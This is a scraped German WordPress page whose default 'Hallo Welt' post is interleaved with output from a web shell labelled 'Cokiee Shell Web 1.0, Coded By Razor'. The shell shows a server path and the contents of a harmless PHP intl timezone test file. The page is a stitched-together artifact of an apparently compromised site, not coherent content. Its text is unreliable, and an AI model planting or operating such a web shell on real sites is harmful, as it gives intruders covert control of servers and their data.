Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/intl/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/intl/tests/timezone_getCanonicalID_variant1.phpt |
--TEST-- IntlTimeZone::getCanonicalID(): second argument --SKIPIF-- <?php if (!extension_loaded('intl')) die('skip intl extension not enabled'); ?> <?php if (version_compare(INTL_ICU_VERSION, '53.1') >= 0) die('skip for ICU < 53.1'); ?> --FILE-- <?php ini_set("intl.error_level", E_WARNING); var_dump(IntlTimeZone::getCanonicalID('Portugal', $isSystemId)); var_dump($isSystemId); var_dump(IntlTimeZone::getCanonicalID('GMT +01:25', $isSystemId)); var_dump($isSystemId); ?> ==DONE== --EXPECT-- string(13) "Europe/Lisbon" bool(true) string(0) "" bool(false) ==DONE==
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare